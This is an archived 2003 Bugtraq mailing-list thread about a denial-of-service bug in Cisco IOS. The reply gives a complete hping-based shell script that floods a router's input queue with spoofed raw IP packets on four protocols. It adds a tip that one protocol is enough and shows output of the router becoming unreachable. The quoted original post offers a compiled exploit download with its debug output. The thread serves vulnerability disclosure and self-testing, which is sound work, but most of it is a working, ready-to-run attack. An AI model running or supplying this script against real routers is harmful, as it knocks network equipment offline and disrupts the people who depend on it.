lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <CC388CB3FD048C43989AFD240B23FCF0022ADB@HQ-MAIL>
Date: Mon, 21 Jul 2003 13:18:41 -0400
From: "Donahue, Pat" <PDonahue@...icorp.com>
To: "Martin Kluge" <martin@...si.de>, <bugtraq@...urityfocus.com>
Subject: RE: Cisco IOS exploit (44020)


Here's a much simpler shell script that produces the same result:

--- BEGIN SHELL SCRIPT ---
#!/bin/tcsh -f

if ($1 == "" || $2 == "") then
  echo "usage: $0 <router hostname|address> <ttl>"
  exit
endif

foreach protocol (53 55 77 103)
    /usr/local/sbin/hping $1 --rawip --rand-source --ttl $2 --ipproto
$protocol --count 19 --interval u250 --data 26
end
--- END SHELL SCRIPT ---

There's little reason to compile source code that will be run as root if
the same thing can be accomplished with a tool that has been used and
trusted by systems administrators for quite some time. Hping can be
found at http://www.hping.org and "is a command-line oriented TCP/IP
packet assembler/analyzer".

Before upgrading my routers, I wrote this script to confirm that they
were indeed vulnerable. As you can see, the script iterates over the
various protocols (SWIPE, IP Mobility, Sun ND, PIM) and sends 19 packets
each using hping for a total of 76 (one more than needed to fill up the
input queue). 

What is interesting to note is that the input queue on the interface can
be exploited using just one of the vulnerable protocols; try changing
the "foreach protocol (53 55 77 103)" line to "foreach protocol (53)"
and then changing the "--count 19" parameter to "--count 76". When I
first read the security advisory I thought that Cisco had tried to make
it seem that all 4 were necessary.

You must be able to open raw sockets so either run the script as root or
set the suid bit. The syntax is: ./exploit.sh <hostname|address> <ttl>
where <hostname|address> is the hostname or IP address of the vulnerable
Cisco IOS device and <ttl> is the TTL subtracted by 255. 

Here is an example:

> ping 192.168.1.1
PING 192.168.1.1 (192.168.1.1): 56 data bytes
64 bytes from 192.168.1.1: icmp_seq=0 ttl=255 time=1.063 ms
^C

> telnet 192.168.1.1
User Access Verification

Password:
telnet> close

# ./exploit.sh 192.168.1.1 0
HPING 192.168.1.1 (rl0 192.168.1.1): raw IP mode set, 20 headers + 26
data bytes
--- 192.168.1.1 hping statistic ---
19 packets tramitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
HPING 192.168.1.1 (rl0 192.168.1.1): raw IP mode set, 20 headers + 26
data bytes
--- 192.168.1.1 hping statistic ---
19 packets tramitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
HPING 192.168.1.1 (rl0 192.168.1.1): raw IP mode set, 20 headers + 26
data bytes
--- 192.168.1.1 hping statistic ---
19 packets tramitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
HPING 192.168.1.1 (rl0 192.168.1.1): raw IP mode set, 20 headers + 26
data bytes
--- 192.168.1.1 hping statistic ---
19 packets tramitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms

> telnet 192.168.1.1
Trying 192.168.1.1...
telnet: Unable to connect to remote host: No route to host

And finally, from the console:

Router> show int FastEthernet0/0 | include Input
  Input queue: 75/75/0/0 (size/max/drops/flushes); Total output drops: 0


Regards,
Patrick Donahue
Network/Systems Administrator
ACMI Corporation

-----Original Message-----
From: Martin Kluge [mailto:martin@...si.de]
Sent: Monday, July 21, 2003 12:02 PM
To: bugtraq@...urityfocus.com
Subject: Cisco IOS exploit (44020)


Hi,

I'd like to submit a DoS attack against the recently found bug in
almost all Cisco IOS versions (Cisco document ID 44020).

The exploit can be found here (and it is included as attachment):

http://www.elxsi.de/cisco-bug-44020.tar.gz


This exploit is NOT broken (like the shadowchode.tar.gz exploit for
example):

Example:

bash-2.05b# telnet 192.168.1.123
Trying 192.168.1.123...
Connected to 192.168.1.123.
Escape character is '^]'.


User Access Verification

Username: 103
Password: ******


1003>show version
IOS (tm) 1000 Software (C1000-BNSY56-M), Version 12.0(22), RELEASE
SOFTWARE (fc1)
Copyright (c) 1986-2002 by cisco Systems, Inc.
Compiled Mon 01-Apr-02 19:36 by srani
Image text-base: 0x02004000, data-base: 0x0259733C

ROM: System Bootstrap, Version 5.3.2(9) [vatran 9], RELEASE SOFTWARE
(fc1)
BOOTFLASH: 1000 Bootstrap Software (C1000-RBOOT-R), Version 10.3(9),
RELEASE SOFTWARE (fc1)

1003 uptime is 6 minutes
System restarted by power-on
System image file is "flash:c1000-bnsy56-mz.120-22.bin"

cisco 1000 (68360) processor (revision D) with 15872K/512K bytes of
memory.
Processor board ID 03305903
Bridging software.
X.25 software, Version 3.0.0.
Basic Rate ISDN software, Version 1.1.
1 Ethernet/IEEE 802.3 interface(s)
1 ISDN Basic Rate interface(s)
7K bytes of non-volatile configuration memory.

bash-2.05b#./cisco-bug-44020 192.168.1.1 192.168.1.123 1 0
DEBUG: Hops: 1
DEBUG: Protocol: 53
DEBUG: Checksum: 47299
DEBUG:  45 10 00 14 32 20 40 00 01 35 c3 b8 c0 a8 01 01 c0 a8 01 7b
DEBUG: Wrote 20 bytes.
DEBUG: Protocol: 55
DEBUG: Checksum: 61909
DEBUG:  45 10 00 14 1f e5 40 00 01 37 d5 f1 c0 a8 01 01 c0 a8 01 7b
DEBUG: Wrote 20 bytes.
DEBUG: Protocol: 55
DEBUG: Checksum: 55515
DEBUG:  45 10 00 14 19 fe 40 00 01 37 db d8 c0 a8 01 01 c0 a8 01 7b
DEBUG: Wrote 20 bytes.
DEBUG: Protocol: 53
DEBUG: Checksum: 10618
DEBUG:  45 10 00 14 7b af 40 00 01 35 7a 29 c0 a8 01 01 c0 a8 01 7b
DEBUG: Wrote 20 bytes.
DEBUG: Protocol: 77
DEBUG: Checksum: 40137
DEBUG:  45 10 00 14 2c 24 40 00 01 4d c9 9c c0 a8 01 01 c0 a8 01 7b
DEBUG: Wrote 20 bytes.
<snip>
...
<snip>
bash-2.05b# telnet 192.168.1.123
Trying 192.168.1.123...
telnet: Unable to connect to remote host: No route to host

If I login via term, I can see the following:

Press RETURN to get started!


00:00:30: %LINK-3-UPDOWN: Interface Ethernet0, changed state to up
00:00:32: %LINEPROTO-5-UPDOWN: Line protocol on Interface Ethernet0,
changed stp
00:00:35: %LINEPROTO-5-UPDOWN: Line protocol on Interface BRI0:1,
changed staten
00:00:35: %LINEPROTO-5-UPDOWN: Line protocol on Interface BRI0:2,
changed staten
00:00:39: %SYS-5-CONFIG_I: Configured from memory by console
00:00:39: %SYS-5-RESTART: System restarted --
Cisco Internetwork Operating System Software
IOS (tm) 1000 Software (C1000-BNSY56-M), Version 12.0(22), RELEASE
SOFTWARE (fc)
Copyright (c) 1986-2002 by cisco Systems, Inc.
Compiled Mon 01-Apr-02 19:36 by srani
00:00:40: %LINK-3-UPDOWN: Interface BRI0, changed state to up
1003>en
Password: ******
1003#show Interfaces Ethernet 0
Ethernet0 is up, line protocol is up
  Hardware is QUICC Ethernet, address is 0060.7062.5727 (bia
0060.7062.5727)
  Internet address is 192.168.1.123/24
  MTU 1500 bytes, BW 10000 Kbit, DLY 1000 usec, rely 255/255, load 1/255
  Encapsulation ARPA, loopback not set, keepalive set (10 sec)
  ARP type: ARPA, ARP Timeout 04:00:00
  Last input 00:02:04, output 00:00:04, output hang never
  Last clearing of "show interface" counters never
  Input queue: 75/75/0/0 (size/max/drops/flushes); Total output drops: 0
               ^^
               ||
               The input queue is full :)


Cheers,
Martin Kluge
-- 
Name      : Martin Kluge
email     : martin@...si.info
Phone     : +49 160 1515182
Projects  : http://www.aa-security.de
GPG Key   : http://www.elxsi.de/key.pub



Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ